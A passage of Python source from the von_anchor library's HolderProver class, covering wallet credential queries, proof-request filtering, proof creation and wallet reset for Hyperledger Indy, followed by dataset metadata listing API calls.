ClosedPool:\n LOGGER.warning(\n 'Holder-Prover %s is offline from pool %s, cannot update revo cache reg delta for %s to %s',\n self.wallet.name,\n self.pool.name,\n rr_id,\n rv)\n\n if archive:\n Caches.archive(self.dir_cache)\n LOGGER.debug('HolderProver.load_cache <<< %s', rv)\n return rv\n\n async def get_box_ids_json(self) -> str:\n \"\"\"\n Return json object on lists of all unique box identifiers for credentials in wallet, as\n evidenced by tails directory content:\n * schema identifiers\n * credential definition identifiers\n * revocation registry identifiers.\n\n E.g.,\n\n ::\n\n {\n \"schema_id\": [\n \"R17v42T4pk...:2:tombstone:1.2\",\n \"9cHbp54C8n...:2:business:2.0\",\n ...\n ],\n \"cred_def_id\": [\n \"R17v42T4pk...:3:CL:19:0\",\n \"9cHbp54C8n...:3:CL:37:0\",\n ...\n ]\n \"rev_reg_id\": [\n \"R17v42T4pk...:4:R17v42T4pk...:3:CL:19:0:CL_ACCUM:0\",\n \"R17v42T4pk...:4:R17v42T4pk...:3:CL:19:0:CL_ACCUM:1\",\n \"9cHbp54C8n...:4:9cHbp54C8n...:3:CL:37:0:CL_ACCUM:0\",\n \"9cHbp54C8n...:4:9cHbp54C8n...:3:CL:37:0:CL_ACCUM:1\",\n \"9cHbp54C8n...:4:9cHbp54C8n...:3:CL:37:0:CL_ACCUM:2\",\n ...\n ]\n }\n\n :return: tuple of sets for schema ids, cred def ids, rev reg ids\n \"\"\"\n\n LOGGER.debug('HolderProver.get_box_ids_json >>>')\n\n rr_ids = {basename(link) for link in Tails.links(self._dir_tails)}\n\n un_rr_ids = set()\n for rr_id in rr_ids:\n if not json.loads(await self.get_cred_infos_by_q(json.dumps({'rev_reg_id': rr_id}), 1)):\n un_rr_ids.add(rr_id)\n rr_ids -= un_rr_ids\n\n cd_ids = {cd_id for cd_id in listdir(self._dir_tails)\n if isdir(join(self._dir_tails, cd_id)) and ok_cred_def_id(cd_id)}\n s_ids = set()\n for cd_id in cd_ids:\n s_ids.add(json.loads(await self.get_schema(cred_def_id2seq_no(cd_id)))['id'])\n\n un_cd_ids = set()\n for cd_id in cd_ids:\n if not json.loads(await self.get_cred_infos_by_q(json.dumps({'cred_def_id': cd_id}), 1)):\n un_cd_ids.add(cd_id)\n cd_ids -= un_cd_ids\n\n un_s_ids = set()\n for s_id in s_ids:\n if not json.loads(await self.get_cred_infos_by_q(json.dumps({'schema_id': s_id}), 1)):\n un_s_ids.add(s_id)\n s_ids -= un_s_ids\n\n rv = json.dumps({\n 'schema_id': list(s_ids),\n 'cred_def_id': list(cd_ids),\n 'rev_reg_id': list(rr_ids)\n })\n LOGGER.debug('HolderProver.get_box_ids_json <<< %s', rv)\n return rv\n\n async def get_cred_infos_by_q(self, query_json: str, limit: int = None) -> str:\n \"\"\"\n Return list of cred-infos from wallet by input WQL query;\n return synopses of all credentials for no query.\n\n The operation supports a subset of WQL; i.e.,\n\n ::\n\n query = {subquery}\n subquery = {subquery, ..., subquery} - WHERE subquery AND ... AND subquery\n subquery = $or: [{subquery},..., {subquery}] - WHERE subquery OR ... OR subquery\n subquery = $not: {subquery} - Where NOT (subquery)\n subquery = \"tagName\": tagValue - WHERE tagName == tagValue\n subquery = \"tagName\": {$in: [tagValue, ..., tagValue]} - WHERE tagName IN (tagValue, ..., tagValue)\n subquery = \"tagName\": {$neq: tagValue} - WHERE tagName != tagValue\n\n but not\n\n ::\n\n subquery = \"tagName\": {$gt: tagValue} - WHERE tagName > tagValue\n subquery = \"tagName\": {$gte: tagValue} - WHERE tagName >= tagValue\n subquery = \"tagName\": {$lt: tagValue} - WHERE tagName < tagValue\n subquery = \"tagName\": {$lte: tagValue} - WHERE tagName <= tagValue\n subquery = \"tagName\": {$like: tagValue} - WHERE tagName LIKE tagValue\n\n :param query_json: WQL query json\n :param limit: maximum number of results to return\n\n :return: cred-infos as json list; i.e.,\n\n ::\n\n [\n {\n \"referent\": string, # credential identifier in the wallet\n \"attrs\": {\n \"attr1\" : {\"raw\": \"value1\", \"encoded\": \"value1_as_int\" },\n \"attr2\" : {\"raw\": \"value2\", \"encoded\": \"value2_as_int\" },\n ...\n }\n \"schema_id\": string,\n \"cred_def_id\": string,\n \"rev_reg_id\": Optional,\n \"cred_rev_id\": Optional\n },\n ...\n ]\n\n \"\"\"\n\n LOGGER.debug('HolderProver.get_cred_infos_by_query >>> query_json: %s, limit: %s', query_json, limit)\n\n infos = []\n if limit and limit < 0:\n limit = None\n\n (handle, cardinality) = await anoncreds.prover_search_credentials(\n self.wallet.handle,\n json.dumps(canon_wql(json.loads(query_json)))) # indy-sdk requires attr name canonicalization\n chunk = min(cardinality, limit or cardinality, Wallet.DEFAULT_CHUNK) # heuristic\n if limit:\n cardinality = min(limit, cardinality)\n try:\n while len(infos) != cardinality:\n batch = json.loads(await anoncreds.prover_fetch_credentials(handle, chunk))\n infos.extend(batch)\n if len(batch) < cardinality:\n break\n if len(infos) != cardinality:\n LOGGER.warning('Credential search/limit indicated %s results but fetched %s', cardinality, len(infos))\n finally:\n await anoncreds.prover_close_credentials_search(handle)\n\n rv_json = json.dumps(infos)\n LOGGER.debug('HolderProver.get_cred_infos_by_query <<< %s', rv_json)\n return rv_json\n\n async def get_cred_infos_by_filter(self, filt: dict = None) -> str:\n \"\"\"\n Return cred-info (list) from wallet by input filter for\n schema identifier and/or credential definition identifier components;\n return info of all credentials for no filter.\n\n :param filt: indy-sdk filter for credentials; i.e.,\n\n ::\n\n {\n \"schema_id\": string, # optional\n \"schema_issuer_did\": string, # optional\n \"schema_name\": string, # optional\n \"schema_version\": string, # optional\n \"issuer_did\": string, # optional\n \"cred_def_id\": string # optional\n }\n\n :return: credential infos as json list; i.e.,\n\n ::\n [\n {\n \"referent\": string, # credential identifier in the wallet\n \"attrs\": {\n \"attr1\" : {\"raw\": \"value1\", \"encoded\": \"value1_as_int\" },\n \"attr2\" : {\"raw\": \"value2\", \"encoded\": \"value2_as_int\" },\n ...\n }\n \"schema_id\": string,\n \"cred_def_id\": string,\n \"rev_reg_id\": Optional,\n \"cred_rev_id\": Optional\n },\n ...\n ]\n\n \"\"\"\n\n LOGGER.debug('HolderProver.get_cred_infos_by_filter >>> filt: %s', filt)\n\n rv_json = await anoncreds.prover_get_credentials(self.wallet.handle, json.dumps(filt or {}))\n LOGGER.debug('HolderProver.get_cred_infos_by_filter <<< %s', rv_json)\n return rv_json\n\n async def get_cred_info_by_id(self, cred_id: str) -> str:\n \"\"\"\n Return cred-info from wallet by wallet credential identifier.\n\n Raise AbsentCred for no such credential.\n\n :param cred_id: credential identifier of interest\n :return: json with cred for input credential identifier\n\n :return: cred-info json; i.e.,\n\n ::\n\n {\n \"referent\": string, # credential identifier in the wallet\n \"attrs\": {\n \"attr1\" : {\"raw\": \"value1\", \"encoded\": \"value1_as_int\" },\n \"attr2\" : {\"raw\": \"value2\", \"encoded\": \"value2_as_int\" },\n ...\n }\n \"schema_id\": string,\n \"cred_def_id\": string,\n \"rev_reg_id\": Optional,\n \"cred_rev_id\": Optional\n }\n \"\"\"\n\n LOGGER.debug('HolderProver.get_cred_info_by_id >>> cred_id: %s', cred_id)\n\n try:\n rv_json = await anoncreds.prover_get_credential(self.wallet.handle, cred_id)\n except IndyError as x_indy: # no such cred\n if x_indy.error_code == ErrorCode.WalletItemNotFound:\n LOGGER.debug(\n 'HolderProver.get_cred_info_by_id: (Set[str], str):\n \"\"\"\n Get credentials from HolderProver wallet corresponding to proof request and\n filter criteria; return credential identifiers from wallet and credentials json.\n Return empty set and empty production for no such credentials.\n\n This method is deprecated - prefer get_cred_briefs_by_proof_req_q() as it filters in-wallet.\n\n :param proof_req_json: proof request json as Verifier creates; has entries for proof request's\n nonce, name, and version; plus credential's requested attributes, requested predicates. I.e.,\n\n ::\n\n {\n 'nonce': string, # indy-sdk makes no semantic specification on this value\n 'name': string, # indy-sdk makes no semantic specification on this value\n 'version': numeric-string, # indy-sdk makes no semantic specification on this value\n 'requested_attributes': {\n '': { # aka attr_referent, a proof-request local identifier\n 'name': string, # attribute name (matches case- and space-insensitively)\n 'restrictions' [ # optional\n {\n \"schema_id\": string, # optional\n \"schema_issuer_did\": string, # optional\n \"schema_name\": string, # optional\n \"schema_version\": string, # optional\n \"issuer_did\": string, # optional\n \"cred_def_id\": string # optional\n },\n {\n ... # if more than one restriction given, combined disjunctively (i.e., via OR)\n }\n ],\n 'non_revoked': { # optional - indy-sdk ignores when getting creds from wallet\n 'from': int, # optional, epoch seconds\n 'to': int # optional, epoch seconds\n }\n },\n ...\n },\n 'requested_predicates': {\n '': { # aka predicate_referent, a proof-request local predicate identifier\n 'name': string, # attribute name (matches case- and space-insensitively)\n 'p_type': '>=',\n 'p_value': int, # predicate value\n 'restrictions': [ # optional\n {\n \"schema_id\": string, # optional\n \"schema_issuer_did\": string, # optional\n \"schema_name\": string, # optional\n \"schema_version\": string, # optional\n \"issuer_did\": string, # optional\n \"cred_def_id\": string # optional\n },\n {\n ... # if more than one restriction given, combined disjunctively (i.e., via OR)\n }\n ],\n 'non_revoked': { # optional - indy-sdk ignores when getting creds from wallet\n 'from': int, # optional, epoch seconds\n 'to': int # optional, epoch seconds\n }\n },\n ...\n },\n 'non_revoked': { # optional - indy-sdk ignores when getting creds from wallet\n 'from': Optional,\n 'to': Optional\n }\n }\n\n :param filt: filter for matching attribute-value pairs and predicates; dict mapping each\n cred def id to dict (specify empty dict or none for no filter, matching all)\n mapping attributes to values to match or compare. E.g.,\n\n ::\n\n {\n 'Vx4E82R17q...:3:CL:16:0': {\n 'attr-match': {\n 'name': 'Alex',\n 'sex': 'M',\n 'favouriteDrink': None\n },\n 'minima': { # if both attr-match and minima present, combined conjunctively (i.e., via AND)\n 'favouriteNumber' : 10,\n 'score': '100' # nicety: implementation converts to int for caller\n },\n },\n 'R17v42T4pk...:3:CL:19:0': {\n 'attr-match': {\n 'height': 175,\n 'birthdate': '1975-11-15' # combined conjunctively (i.e., via AND)\n }\n },\n 'Z9ccax812j...:3:CL:27:0': {\n 'attr-match': {} # match all attributes on this cred def\n }\n ...\n }\n\n :param filt_dflt_incl: whether to include (True) all credentials from wallet that filter does not\n identify by cred def, or to exclude (False) all such credentials\n :return: tuple with (set of referents, creds json for input proof request);\n empty set and empty production for no such credential\n \"\"\"\n\n LOGGER.debug('HolderProver.get_creds >>> proof_req_json: %s, filt: %s', proof_req_json, filt)\n\n if filt is None:\n filt = {}\n rv = None\n creds_json = await anoncreds.prover_get_credentials_for_proof_req(self.wallet.handle, proof_req_json)\n creds = json.loads(creds_json)\n cred_ids = set()\n\n if filt:\n for cd_id in filt:\n try:\n json.loads(await self.get_cred_def(cd_id))\n except AbsentCredDef:\n LOGGER.warning('HolderProver.get_creds: ignoring filter criterion, no cred def on %s', cd_id)\n filt.pop(cd_id)\n\n for briefs in {**creds['attrs'], **creds['predicates']}.values():\n for brief in briefs: # brief is a dict in a list of dicts\n cred_info = brief['cred_info']\n if filt:\n cred_cd_id = cred_info['cred_def_id']\n if cred_cd_id not in filt:\n if filt_dflt_incl:\n cred_ids.add(cred_info['referent'])\n continue\n if 'attr-match' in (filt[cred_cd_id] or {}): # maybe filt[cred_cd_id]: None\n if not {k: str(filt[cred_cd_id].get('attr-match', {})[k])\n for k in filt[cred_cd_id].get('attr-match', {})}.items() <= cred_info['attrs'].items():\n continue\n if 'minima' in (filt[cred_cd_id] or {}): # maybe filt[cred_cd_id]: None\n minima = filt[cred_cd_id].get('minima', {})\n try:\n if any((attr not in cred_info['attrs'])\n or (int(cred_info['attrs'][attr]) < int(minima[attr]))\n for attr in minima):\n continue\n except ValueError:\n continue # int conversion failed - reject candidate\n cred_ids.add(cred_info['referent'])\n else:\n cred_ids.add(cred_info['referent'])\n\n if filt:\n creds = json.loads(prune_creds_json(creds, cred_ids))\n\n rv = (cred_ids, json.dumps(creds))\n LOGGER.debug('HolderProver.get_creds <<< %s', rv)\n return rv\n\n async def get_cred_briefs_by_proof_req_q(\n self,\n proof_req_json: str,\n x_queries_json: str = None) -> (Set[str], str):\n \"\"\"\n Return cred-briefs from wallet by proof request and WQL queries by\n proof request referent. Return no cred-briefs no WQL query - util.proof_req2wql_all()\n builds WQL to retrieve all cred-briefs for some or all cred-def-ids in a proof request.\n\n For each WQL query on an item referent, indy-sdk takes the WQL and the attribute name\n and restrictions (e.g., cred def id, schema id, etc.) from its referent. Note that\n util.proof_req_attr_referents() maps cred defs and attr names to proof req item referents,\n bridging the gap between attribute names and their corresponding item referents.\n\n :param proof_req_json: proof request as per get_creds(); e.g.,\n\n ::\n\n {\n \"nonce\": \"1532429687\",\n \"name\": \"proof_req\",\n \"version\": \"0.0\",\n \"requested_predicates\": {},\n \"requested_attributes\": {\n \"17_name_uuid\": {\n \"restrictions\": [\n {\n \"cred_def_id\": \"LjgpST2rjsoxYegQDRm7EL:3:CL:17:0\"\n }\n ],\n \"name\": \"name\"\n },\n \"17_thing_uuid\": {\n \"restrictions\": [\n {\n \"cred_def_id\": \"LjgpST2rjsoxYegQDRm7EL:3:CL:17:0\"\n }\n ],\n \"name\": \"thing\"\n }\n }\n }\n\n :param x_queries_json: json list of extra queries to apply to proof request attribute and predicate\n referents; e.g.,\n\n ::\n {\n \"17_thing_uuid\": { # require attr presence on name 'thing', cred def id from proof req above\n \"$or\": [\n {\n \"attr::name::value\": \"J.R. 'Bob' Dobbs\"\n },\n {\n \"attr::thing::value\": \"slack\"\n },\n ]\n },\n }\n\n :return: tuple with set of wallet cred ids, json list of cred briefs;\n e.g.,\n\n ::\n (\n {\n 'b42ce5bc-b690-43cd-9493-6fe86ad25e85',\n 'd773434a-0080-4e3e-a03b-f2033eae7d75'\n },\n '[\n {\n \"interval\": null,\n \"cred_info\": {\n \"schema_id\": \"LjgpST2rjsoxYegQDRm7EL:2:non-revo:1.0\",\n \"rev_reg_id\": null,\n \"attrs\": {\n \"name\": \"Chicken Hawk\",\n \"thing\": \"chicken\"\n },\n \"cred_rev_id\": null,\n \"referent\": \"d773434a-0080-4e3e-a03b-f2033eae7d75\",\n \"cred_def_id\": \"LjgpST2rjsoxYegQDRm7EL:3:CL:17:0\"\n }\n },\n {\n \"interval\": null,\n \"cred_info\": {\n \"schema_id\": \"LjgpST2rjsoxYegQDRm7EL:2:non-revo:1.0\",\n \"rev_reg_id\": null,\n \"attrs\": {\n \"name\": \"J.R. \\\"Bob\\\" Dobbs\",\n \"thing\": \"slack\"\n },\n \"cred_rev_id\": null,\n \"referent\": \"b42ce5bc-b690-43cd-9493-6fe86ad25e85\",\n \"cred_def_id\": \"LjgpST2rjsoxYegQDRm7EL:3:CL:17:0\"\n }\n }\n ]'\n }\n \"\"\"\n\n LOGGER.debug(\n ('HolderProver.get_cred_briefs_by_proof_req_query >>> proof_req_json: %s, x_queries_json: %s'),\n proof_req_json,\n x_queries_json)\n\n rv = None\n\n x_queries = json.loads(x_queries_json or '{}')\n for k in x_queries:\n x_queries[k] = canon_wql(x_queries[k]) # indy-sdk requires attr name canonicalization\n\n handle = await anoncreds.prover_search_credentials_for_proof_req(\n self.wallet.handle,\n proof_req_json,\n json.dumps(x_queries) if x_queries else None)\n briefs = []\n cred_ids = set()\n proof_req = json.loads(proof_req_json)\n\n try:\n for item_referent in (x_queries\n if x_queries\n else {**proof_req['requested_attributes'], **proof_req['requested_predicates']}):\n count = Wallet.DEFAULT_CHUNK\n while count == Wallet.DEFAULT_CHUNK:\n fetched = json.loads(await anoncreds.prover_fetch_credentials_for_proof_req(\n handle,\n item_referent,\n Wallet.DEFAULT_CHUNK))\n count = len(fetched)\n for brief in fetched:\n if brief['cred_info']['referent'] not in cred_ids:\n cred_ids.add(brief['cred_info']['referent'])\n briefs.append(brief)\n finally:\n await anoncreds.prover_close_credentials_search_for_proof_req(handle)\n\n rv = (cred_ids, json.dumps(briefs))\n LOGGER.debug('HolderProver.get_cred_briefs_by_proof_req_query <<< %s', rv)\n return rv\n\n\n async def create_proof(self, proof_req: dict, creds: Union[dict, list], requested_creds: dict) -> str:\n \"\"\"\n Create proof as HolderProver.\n\n Raise:\n * AbsentLinkSecret if link secret not set\n * CredentialFocus on attempt to create proof on no creds or multiple creds for a credential definition\n * AbsentTails if missing required tails file\n * BadRevStateTime if a timestamp for a revocation registry state in the proof request\n occurs before revocation registry creation\n * IndyError for any other indy-sdk error.\n * AbsentInterval if creds missing non-revocation interval, but cred def supports revocation\n\n :param proof_req: proof request as per get_creds() above\n :param creds: credentials to prove: indy-sdk creds structure or list of cred-briefs\n :param requested_creds: data structure with self-attested attribute info, requested attribute info\n and requested predicate info, assembled from get_creds() and filtered for content of interest. I.e.,\n\n ::\n\n {\n 'self_attested_attributes': {},\n 'requested_attributes': {\n 'attr0_uuid': {\n 'cred_id': string,\n 'timestamp': integer, # for revocation state\n 'revealed': bool\n },\n ...\n },\n 'requested_predicates': {\n 'predicate0_uuid': {\n 'cred_id': string,\n 'timestamp': integer # for revocation state\n }\n }\n }\n\n :return: proof json\n \"\"\"\n\n LOGGER.debug(\n 'HolderProver.create_proof >>> proof_req: %s, creds: %s, requested_creds: %s',\n proof_req,\n creds,\n requested_creds)\n\n self._assert_link_secret('create_proof')\n\n if isinstance(creds, dict):\n x_uuids = [attr_uuid for attr_uuid in creds['attrs'] if len(creds['attrs'][attr_uuid]) != 1]\n if x_uuids:\n LOGGER.debug('HolderProver.create_proof: int(time()):\n LOGGER.debug(\n 'HolderProver.create_proof: str:\n \"\"\"\n Close and delete HolderProver wallet, then create and open a replacement on prior link secret.\n Note that this operation effectively destroys private keys for credential definitions. Its\n intended use is primarily for testing and demonstration.\n\n Raise AbsentLinkSecret if link secret not set.\n\n :return: wallet name\n \"\"\"\n\n LOGGER.debug('HolderProver.reset_wallet >>>')\n\n self._assert_link_secret('reset_wallet')\n\n seed = self.wallet._seed\n wallet_name = self.wallet.name\n wallet_auto_remove = self.wallet.auto_remove\n wallet_cfg = self.wallet.cfg\n wallet_cfg['auto-remove'] = wallet_auto_remove\n wallet_xtype = self.wallet.xtype\n wallet_access_creds = self.wallet.access_creds\n\n await self.wallet.close()\n if not self.wallet.auto_remove:\n await self.wallet.remove()\n self.wallet = await Wallet(\n seed,\n wallet_name,\n wallet_xtype,\n wallet_cfg,\n wallet_access_creds).create()\n await self.wallet.open()\n\n await self.create_link_secret(self._link_secret) # carry over link secret to new wallet\n\n rv = self.wallet.name\n LOGGER.debug('HolderProver.reset_wallet <<< %s', rv)\n return rv\n", "repo_name": "AlwaysFurther/von_anchor", "sub_path": "von_anchor/anchor/holder_prover.py", "file_name": "holder_prover.py", "file_ext": "py", "file_size_in_byte": 58368, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 40, "usage_type": "call"}, {"api_name": "von_anchor.anchor.base._BaseAnchor", "line_number": 43, "usage_type": "name"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 50, "usage_type": "name"}, {"api_name": "von_anchor.nodepool.NodePool", "line_number": 50, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 72, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 73, "usage_type": "call"}, {"api_name": "von_anchor.validate_config.validate_config", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path.expanduser", "line_number": 78, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 79, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentLinkSecret", "line_number": 92, "usage_type": "call"}, {"api_name": "von_anchor.validate_config.validate_config", "line_number": 113, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_rev_reg_id", "line_number": 138, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 140, "usage_type": "call"}, {"api_name": "von_anchor.util.rev_reg_id2cred_def_id_tag", "line_number": 142, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 145, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentCredDef", "line_number": 146, "usage_type": "name"}, {"api_name": "von_anchor.error.AbsentCredDef", "line_number": 149, "usage_type": "call"}, {"api_name": "von_anchor.error.ClosedPool", "line_number": 150, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.lock", "line_number": 153, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 153, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.get", "line_number": 154, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 154, "usage_type": "name"}, {"api_name": "von_anchor.tails.Tails", "line_number": 158, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentTails", "line_number": 159, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 162, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails.dir", "line_number": 162, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 162, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 163, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentTails", "line_number": 165, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails.associate", "line_number": 166, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 166, "usage_type": "name"}, {"api_name": "von_anchor.tails.Tails", "line_number": 167, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 170, "usage_type": "name"}, {"api_name": "von_anchor.cache.RevoCacheEntry", "line_number": 170, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 172, "usage_type": "name"}, {"api_name": "von_anchor.util.ok_rev_reg_id", "line_number": 199, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 201, "usage_type": "call"}, {"api_name": "indy.ledger.build_get_revoc_reg_delta_request", "line_number": 206, "usage_type": "call"}, {"api_name": "indy.ledger", "line_number": 206, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 208, "usage_type": "call"}, {"api_name": "indy.ledger.parse_get_revoc_reg_delta_response", "line_number": 212, "usage_type": "call"}, {"api_name": "indy.ledger", "line_number": 212, "usage_type": "name"}, {"api_name": "indy.error.IndyError", "line_number": 213, "usage_type": "name"}, {"api_name": "von_anchor.error.AbsentRevReg", "line_number": 215, "usage_type": "call"}, {"api_name": "von_anchor.error.BadRevStateTime", "line_number": 221, "usage_type": "call"}, {"api_name": "indy.anoncreds.issuer_merge_revocation_registry_deltas", "line_number": 224, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 224, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 225, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_cred_def_id", "line_number": 302, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 304, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 307, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentCredDef", "line_number": 308, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 358, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_rev_reg_id", "line_number": 372, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 374, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails.dir", "line_number": 376, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 376, "usage_type": "name"}, {"api_name": "von_anchor.cache.Caches.parse", "line_number": 393, "usage_type": "call"}, {"api_name": "von_anchor.cache.Caches", "line_number": 393, "usage_type": "name"}, {"api_name": "von_anchor.tails.Tails.links", "line_number": 395, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 395, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 396, "usage_type": "call"}, {"api_name": "von_anchor.cache.Caches.purge_archives", "line_number": 413, "usage_type": "call"}, {"api_name": "von_anchor.cache.Caches", "line_number": 413, "usage_type": "name"}, {"api_name": "von_anchor.tails.Tails.links", "line_number": 416, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 416, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 417, "usage_type": "call"}, {"api_name": "von_anchor.error.ClosedPool", "line_number": 420, "usage_type": "name"}, {"api_name": "von_anchor.tails.Tails.links", "line_number": 435, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 435, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 436, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 438, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails.links", "line_number": 438, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 438, "usage_type": "name"}, {"api_name": "von_anchor.util.ok_cred_def_id", "line_number": 478, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 480, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 483, "usage_type": "call"}, {"api_name": "von_anchor.error.ClosedPool", "line_number": 484, "usage_type": "name"}, {"api_name": "von_anchor.error.CacheIndex", "line_number": 486, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE.lock", "line_number": 490, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 490, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.dflt_interval", "line_number": 491, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 491, "usage_type": "name"}, {"api_name": "von_anchor.error.CacheIndex", "line_number": 496, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_create_master_secret", "line_number": 515, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 515, "usage_type": "name"}, {"api_name": "indy.error.IndyError", "line_number": 516, "usage_type": "name"}, {"api_name": "indy.error.ErrorCode.AnoncredsMasterSecretDuplicateNameError", "line_number": 517, "usage_type": "attribute"}, {"api_name": "indy.error.ErrorCode", "line_number": 517, "usage_type": "name"}, {"api_name": "von_anchor.util.ok_cred_def_id", "line_number": 542, "usage_type": "call"}, {"api_name": "von_anchor.error.BadIdentifier", "line_number": 544, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 550, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 552, "usage_type": "call"}, {"api_name": "von_anchor.error.AbsentSchema", "line_number": 557, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_create_credential_req", "line_number": 558, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 558, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 585, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_store_credential", "line_number": 593, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 593, "usage_type": "name"}, {"api_name": "time.time", "line_number": 617, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 618, "usage_type": "call"}, {"api_name": "von_anchor.cache.SCHEMA_CACHE.lock", "line_number": 620, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.SCHEMA_CACHE", "line_number": 620, "usage_type": "name"}, {"api_name": "von_anchor.cache.CRED_DEF_CACHE.lock", "line_number": 623, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.CRED_DEF_CACHE", "line_number": 623, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.lock", "line_number": 627, "usage_type": "attribute"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 627, "usage_type": "name"}, {"api_name": "von_anchor.cache.REVO_CACHE.get", "line_number": 628, "usage_type": "call"}, {"api_name": "von_anchor.cache.REVO_CACHE", "line_number": 628, "usage_type": "name"}, {"api_name": "von_anchor.error.ClosedPool", "line_number": 632, "usage_type": "name"}, {"api_name": "von_anchor.cache.Caches.archive", "line_number": 641, "usage_type": "call"}, {"api_name": "von_anchor.cache.Caches", "line_number": 641, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 683, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails.links", "line_number": 683, "usage_type": "call"}, {"api_name": "von_anchor.tails.Tails", "line_number": 683, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 687, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 687, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 691, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 692, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 692, "usage_type": "call"}, {"api_name": "von_anchor.util.ok_cred_def_id", "line_number": 692, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 695, "usage_type": "call"}, {"api_name": "von_anchor.util.cred_def_id2seq_no", "line_number": 695, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 699, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 699, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 705, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 705, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 709, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_search_credentials", "line_number": 775, "usage_type": "call"}, {"api_name": "indy.anoncreds", "line_number": 775, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 777, "usage_type": "call"}, {"api_name": "von_anchor.codec.canon_wql", "line_number": 777, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 777, "usage_type": "call"}, {"api_name": "von_anchor.wallet.Wallet.DEFAULT_CHUNK", "line_number": 778, "usage_type": "attribute"}, {"api_name": "von_anchor.wallet.Wallet", "line_number": 778, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 783, "usage_type": "call"}, {"api_name": "indy.anoncreds.prover_fetch_credentials", "line_number": 783, "usage_type": "call"}, {"api_name": 